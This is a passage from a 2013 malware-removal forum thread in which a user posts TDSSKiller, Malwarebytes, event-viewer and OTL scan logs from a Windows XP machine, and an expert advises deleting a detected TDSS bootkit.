20:32:59.0828 3536 WMPNetworkSvc - ok
20:32:59.0859 3536 [ CF4DEF1BF66F06964DC0D91844239104 ] WpdUsb C:\WINDOWS\system32\DRIVERS\wpdusb.sys
20:32:59.0890 3536 WpdUsb - ok
20:32:59.0937 3536 [ 6ABE6E225ADB5A751622A9CC3BC19CE8 ] WS2IFSL C:\WINDOWS\System32\drivers\ws2ifsl.sys
20:33:00.0093 3536 WS2IFSL - ok
20:33:00.0140 3536 [ 7C278E6408D1DCE642230C0585A854D5 ] wscsvc C:\WINDOWS\system32\wscsvc.dll
20:33:00.0312 3536 wscsvc - ok
20:33:00.0343 3536 [ 35321FB577CDC98CE3EB3A3EB9E4610A ] wuauserv C:\WINDOWS\system32\wuauserv.dll
20:33:00.0500 3536 wuauserv - ok
20:33:00.0531 3536 [ F15FEAFFFBB3644CCC80C5DA584E6311 ] WudfPf C:\WINDOWS\system32\DRIVERS\WudfPf.sys
20:33:00.0593 3536 WudfPf - ok
20:33:00.0625 3536 [ 28B524262BCE6DE1F7EF9F510BA3985B ] WudfRd C:\WINDOWS\system32\DRIVERS\wudfrd.sys
20:33:00.0656 3536 WudfRd - ok
20:33:00.0687 3536 [ 05231C04253C5BC30B26CBAAE680ED89 ] WudfSvc C:\WINDOWS\System32\WUDFSvc.dll
20:33:00.0750 3536 WudfSvc - ok
20:33:00.0812 3536 [ 81DC3F549F44B1C1FFF022DEC9ECF30B ] WZCSVC C:\WINDOWS\System32\wzcsvc.dll
20:33:01.0031 3536 WZCSVC - ok
20:33:01.0046 3536 [ 295D21F14C335B53CB8154E5B1F892B9 ] xmlprov C:\WINDOWS\System32\xmlprov.dll
20:33:01.0218 3536 xmlprov - ok
20:33:01.0234 3536 ================ Scan global ===============================
20:33:01.0265 3536 [ 42F1F4C0AFB08410E5F02D4B13EBB623 ] C:\WINDOWS\system32\basesrv.dll
20:33:01.0296 3536 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
20:33:01.0328 3536 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
20:33:01.0359 3536 [ 65DF52F5B8B6E9BBD183505225C37315 ] C:\WINDOWS\system32\services.exe
20:33:01.0359 3536 [Global] - ok
20:33:01.0359 3536 ================ Scan MBR ==================================
20:33:01.0390 3536 [ BAD0263FBE81B49F5F07B32DC9D198B3 ] \Device\Harddisk0\DR0
20:33:01.0609 3536 \Device\Harddisk0\DR0 ( TDSS File System ) - warning
20:33:01.0609 3536 \Device\Harddisk0\DR0 - detected TDSS File System (1)
20:33:01.0609 3536 ================ Scan VBR ==================================
20:33:01.0609 3536 [ 085D431551BA33298DDBA5C93B1F437B ] \Device\Harddisk0\DR0\Partition1
20:33:01.0625 3536 \Device\Harddisk0\DR0\Partition1 - ok
20:33:01.0625 3536 [ 98DE57513725D00BD7B7284BCAEF83E8 ] \Device\Harddisk0\DR0\Partition2
20:33:01.0625 3536 \Device\Harddisk0\DR0\Partition2 - ok
20:33:01.0625 3536 ============================================================
20:33:01.0625 3536 Scan finished
20:33:01.0625 3536 ============================================================
20:33:01.0734 2024 Detected object count: 13
20:33:01.0734 2024 Actual detected object count: 13
20:33:18.0171 2024 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0171 2024 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0171 2024 hpqcxs08 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0171 2024 hpqcxs08 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0171 2024 hpqddsvc ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0171 2024 hpqddsvc ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0171 2024 Iviaspi ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0171 2024 Iviaspi ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 McciCMService ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 McciCMService ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 MREMP50 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 MREMP50 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 MREMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 MREMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 MRENDIS5 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 MRENDIS5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 MRESP50 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 MRESP50 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0203 2024 Pfc ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0203 2024 Pfc ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0203 2024 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0203 2024 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0203 2024 \Device\Harddisk0\DR0 ( TDSS File System ) - skipped by user
20:33:18.0203 2024 \Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Skip

#7
RKinner

Posted 18 January 2013 - 08:54 PM

Malware Expert

Expert
24,624 posts

Run TDSSKiller again and tell it to Delete the TDSS File System:

20:33:18.0203 2024 \Device\Harddisk0\DR0 ( TDSS File System ) - skipped by user
20:33:18.0203 2024 \Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Skip

#8
goodseed

Posted 18 January 2013 - 10:15 PM

Member

Topic Starter
Member
49 posts

Malwarebytes Anti-Malware 1.70.0.1100
www.malwarebytes.org

Database version: v2013.01.19.01

Windows XP Service Pack 3 x86 NTFS
Internet Explorer 8.0.6001.18702
Owner :: YOUR-46E94OWX6A [administrator]

1/18/2013 10:06:57 PM
mbam-log-2013-01-18 (22-06-57).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 246744
Time elapsed: 6 minute(s), 14 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)

#9
goodseed

Posted 18 January 2013 - 10:48 PM

Member

Topic Starter
Member
49 posts

Vino's Event Viewer v01c run on Windows XP in English
Report run at 18/01/2013 10:46:34 PM

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 18/01/2013 10:24:11 PM
Type: error Category: 0
Event: 7023 Source: Service Control Manager
The HP CUE DeviceDiscovery Service service terminated with the following error: Unspecified error

Log: 'System' Date/Time: 18/01/2013 10:24:07 PM
Type: error Category: 0
Event: 7022 Source: Service Control Manager
The HP CUE DeviceDiscovery Service service hung on starting.

Log: 'System' Date/Time: 18/01/2013 10:22:43 PM
Type: error Category: 0
Event: 7001 Source: Service Control Manager
The AVG Free E-mail Scanner service depends on the AVG Free WatchDog service which failed to start because of the following error: The system cannot find the path specified.

Log: 'System' Date/Time: 18/01/2013 10:22:43 PM
Type: error Category: 0
Event: 7000 Source: Service Control Manager
The mrtRate service failed to start due to the following error: The system cannot find the file specified.

Log: 'System' Date/Time: 18/01/2013 10:22:43 PM
Type: error Category: 0
Event: 7000 Source: Service Control Manager
The AVG Free WatchDog service failed to start due to the following error: The system cannot find the path specified.

Log: 'System' Date/Time: 18/01/2013 10:22:43 PM
Type: error Category: 0
Event: 7000 Source: Service Control Manager
The SAS Core Service service failed to start due to the following error: The system cannot find the path specified.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#10
goodseed

Posted 18 January 2013 - 11:15 PM

Member

Topic Starter
Member
49 posts

OTL logfile created on: 1/18/2013 10:56:15 PM - Run 3
OTL by OldTimer - Version 3.2.31.0 Folder = C:\Documents and Settings\Owner\Desktop
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

503.29 Mb Total Physical Memory | 161.04 Mb Available Physical Memory | 32.00% Memory free
1.20 Gb Paging File | 0.67 Gb Available in Paging File | 55.53% Paging File free
Paging file location(s): C:\pagefile.sys 756 1512 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 144.18 Gb Total Space | 75.04 Gb Free Space | 52.05% Space Free | Partition Type: NTFS
Drive D: | 4.85 Gb Total Space | 0.83 Gb Free Space | 17.18% Space Free | Partition Type: FAT32

Computer Name: YOUR-46E94OWX6A | User Name: Owner | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
PRC - [2012/11/01 13:45:21 | 004,763,008 | ---- | M] (SUPERAntiSpyware.com) -- C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
PRC - [2012/10/30 17:50:59 | 004,297,136 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe
PRC - [2012/10/30 17:50:59 | 000,044,808 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe
PRC - [2012/01/03 17:12:00 | 000,584,192 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Owner\Desktop\OTL(1).exe
PRC - [2011/07/28 17:08:12 | 001,259,376 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
PRC - [2010/04/30 18:36:16 | 001,742,336 | ---- | M] (Alcatel-Lucent) -- C:\Program Files\Windstream_BCUC\McciTrayApp.exe
PRC - [2008/04/13 18:12:19 | 001,033,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2006/11/03 19:19:58 | 000,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe
PRC - [2003/11/07 03:50:00 | 000,019,968 | ---- | M] (Logitech Inc.) -- C:\WINDOWS\LOGI_MWX.EXE

========== Modules (No Company Name) ==========

MOD - [2013/01/10 21:16:48 | 003,021,872 | ---- | M] () -- C:\Program Files\Mozilla Firefox\mozjs.dll
MOD - [2012/12/17 01:22:00 | 002,040,320 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\defs\12121700\algo.dll
MOD - [2011/07/28 17:09:42 | 000,096,112 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2011/07/28 17:08:12 | 001,259,376 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
MOD - [2009/12/20 19:42:16 | 000,176,235 | ---- | M] () -- C:\WINDOWS\system32\Primomonnt.dll
MOD - [2008/04/13 18:11:59 | 000,014,336 | ---- | M] () -- C:\WINDOWS\system32\msdmo.dll

========== Win32 Services (SafeList) ==========

SRV - File not found [Disabled | Stopped] -- -- (HidServ)
SRV - File not found [Auto | Stopped] -- -- (avg9wd)
SRV - File not found [Auto | Stopped] -- -- (avg9emc)
SRV - File not found [On_Demand | Stopped] -- -- (AppMgmt)
SRV - File not found [Auto | Stopped] -- -- (!SASCORE)
SRV - [2013/01/10 21:16:50 | 000,115,760 | ---- | M] (Mozilla Foundation) [Disabled | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2012/10/30 17:50:59 | 000,044,808 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV - [2006/11/03 19:19:58 | 000,013,592 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)

========== Driver Services (SafeList) ==========

DRV - [2012/10/30 17:51:58 | 000,738,504 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\WINDOWS\System32\drivers\aswSnx.sys -- (aswSnx)
DRV - [2012/10/30 17:51:58 | 000,361,032 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswSP.sys -- (aswSP)
DRV - [2012/10/30 17:51:58 | 000,054,232 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswTdi.sys -- (aswTdi)
DRV - [2012/10/30 17:51:58 | 000,035,928 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswRdr.sys -- (AswRdr)
DRV - [2012/10/30 17:51:57 | 000,097,608 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswmon2.sys -- (aswMon2)
DRV - [2012/10/30 17:51:56 | 000,025,256 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aavmker4.sys -- (Aavmker4)
DRV - [2012/10/30 17:51:56 | 000,021,256 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswFsBlk.sys -- (aswFsBlk)
DRV - [2011/07/22 10:27:02 | 000,012,880 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\sasdifsv.sys -- (SASDIFSV)
DRV - [2011/07/12 15:55:22 | 000,067,664 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS -- (SASKUTIL)
DRV - [2010/06/30 02:27:08 | 000,049,904 | R--- | M] (Avanquest Software) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\BVRPMPR5.SYS -- (BVRPMPR5)
DRV - [2010/04/30 18:32:06 | 000,020,096 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MRESP50.sys -- (MRESP50)
DRV - [2010/04/30 18:30:56 | 000,021,248 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MREMP50.sys -- (MREMP50)
DRV - [2009/05/14 14:20:02 | 000,030,656 | ---- | M] (Eutron) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\eusk2par.sys -- (eusk2par)
DRV - [2005/12/12 17:27:00 | 000,019,072 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\PS2.sys -- (Ps2)
DRV - [2004/11/22 17:36:40 | 000,018,003 | ---- | M] (Motive, Inc.) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MRENDIS5.sys -- (MRENDIS5)
DRV - [2004/11/22 17:36:34 | 000,019,345 | ---- | M] (Motive, Inc.) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MREMPR5.sys -- (MREMPR5)
DRV - [2004/06/29 09:07:18 | 001,268,204 | ---- | M] (Agere Systems) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\AGRSM.sys -- (AgereSoftModem)
DRV - [2004/05/12 03:36:50 | 000,043,672 | ---- | M] (Oak Technology Inc.) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\AFS2K.SYS -- (AFS2K)
DRV - [2004/05/05 07:02:12 | 002,155,200 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService) Service for Realtek HD Audio (WDM)
DRV - [2004/01/02 21:05:48 | 000,011,520 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\srvkp.sys -- (SiSkp)
DRV - [2004/01/02 20:20:40 | 000,432,000 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\sisgrp.sys -- (SiS315)
DRV - [2003/12/02 19:23:20 | 000,142,336 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\WINDOWS\System32\DRIVERS\fasttx2k.sys -- (fasttx2k)
DRV - [2003/11/07 03:50:00 | 000,070,798 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\LMouFlt2.Sys -- (LMouFlt2)
DRV - [2003/11/07 03:50:00 | 000,051,486 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042pr2.Sys -- (L8042pr2)
DRV - [2003/09/19 00:47:00 | 000,010,368 | ---- | M] (Padus, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\pfc.sys -- (Pfc)
DRV - [2003/07/18 17:58:20 | 000,036,992 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | Boot | Running] -- C:\WINDOWS\System32\DRIVERS\SISAGPX.sys -- (SISAGP)
DRV - [2003/07/02 12:42:00 | 000,027,904 | ---- | M] (VIA Technologies, Inc.) [Kernel | Boot | Running] -- C:\WINDOWS\System32\DRIVERS\viaagp1.sys -- (viaagp1)
DRV - [2002/10/04 18:04:10 | 000,046,976 | ---- | M] (Realtek Semiconductor Corporation ) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\R8139n51.sys -- (rtl8139)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>

========== FireFox ==========

FF - prefs.js..browser.search.order.1: "Search"
FF - prefs.js..browser.startup.homepage: "www.startpage.com"
FF - prefs.js..extensions.enabledItems: [email protected]:1.0
FF - prefs.js..extensions.enabledItems: {ABDE892B-13A8-4d1b-88E6-365A6E755758}:1.0
FF - prefs.js..extensions.enabledItems: {3f963a5b-e555-4543-90e2-c3908898db71}:10.0.0.1167
FF - prefs.js..keyword.URL: "http://search.mywebs...10101070100&s="

FF - user.js..browser.search.order.1: "Search"
FF - user.js..keyword.URL: "http://search.mywebs...10101070100&s="

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@bittorrent.com/BitTorrentDNA: C:\Program Files\DNA\plugins\npbtdna.dll (BitTorrent, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Content Upload Plugin,version=1.0.0: File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Player Plugin,version=1.0.0: File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Motive.com/NpMotive,version=1.0: C:\Program Files\Common Files\Motive\npMotive.dll (Alcatel-Lucent)
FF - HKLM\Software\MozillaPlugins\@real.com/RhapsodyPlayerEngine,version=1.1: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=8: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@adobe.com/FlashPlayer: File not found

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2011/12/20 09:19:45 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\AVAST Software\Avast\WebRep\FF [2013/01/14 19:24:00 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/01/10 21:17:06 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

[2008/08/27 05:09:54 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Extensions
[2013/01/11 09:03:21 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions
[2013/01/11 09:03:21 | 000,000,000 | ---D | M] ("Codec-V") -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\[email protected]
[2013/01/11 09:03:20 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\[email protected]\chrome\content\extensionCode
[2013/01/10 21:14:59 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2011/12/20 09:19:45 | 000,000,000 | ---D | M] (DivX Plus Web Player HTML5 <video>) -- C:\PROGRAM FILES\DIVX\DIVX PLUS WEB PLAYER\FIREFOX\DIVXHTML5
[2013/01/10 21:17:04 | 000,262,704 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012/10/12 21:17:06 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2012/10/12 21:17:06 | 000,002,058 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}sourceid=chrome&ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&hl={language}&q={searchTerms}&sugkey={google:suggestAPIKeyParameter}
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin2.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin3.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin4.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin5.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin6.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin7.dll
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npdrmv2.dll
CHR - plugin: Windows Media Player Plug-in Dynamic Link Library (Enabled) = C:\Program Files\Windows Media Player\npdsplay.dll
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npwmsdrm.dll
CHR - plugin: Motive Plugin (Enabled) = C:\Program Files\Common Files\Motive\npMotive.dll
CHR - plugin: DNA Plug-in (Enabled) = C:\Program Files\DNA\plugins\npbtdna.dll
CHR - plugin: DivX VOD Helper Plug-in (Enabled) = C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll
CHR - plugin: DivX Plus Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll
CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll
CHR - plugin: Windows Presentation Foundation (Enabled) = c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
CHR - Extension: Google Docs = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.4_0\
CHR - Extension: Google Drive = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\
CHR - Extension: Google Search = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\
CHR - Extension: avast! WebRep = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\icmlaeflemplmjndnaapfdbbnpncnbda\7.0.1474_0\
CHR - Extension: Codec-V = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho\1.20.67_0\crossrider
CHR - Extension: Codec-V = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho\1.20.67_0\
CHR - Extension: DivX Plus Web Player HTML5 \u003Cvideo\u003E = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm\2.1.2.145_0\
CHR - Extension: Gmail = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\

O1 HOSTS File: ([2013/01/18 20:21:08 | 000,000,027 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (Adobe PDF Reader Link Helper) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
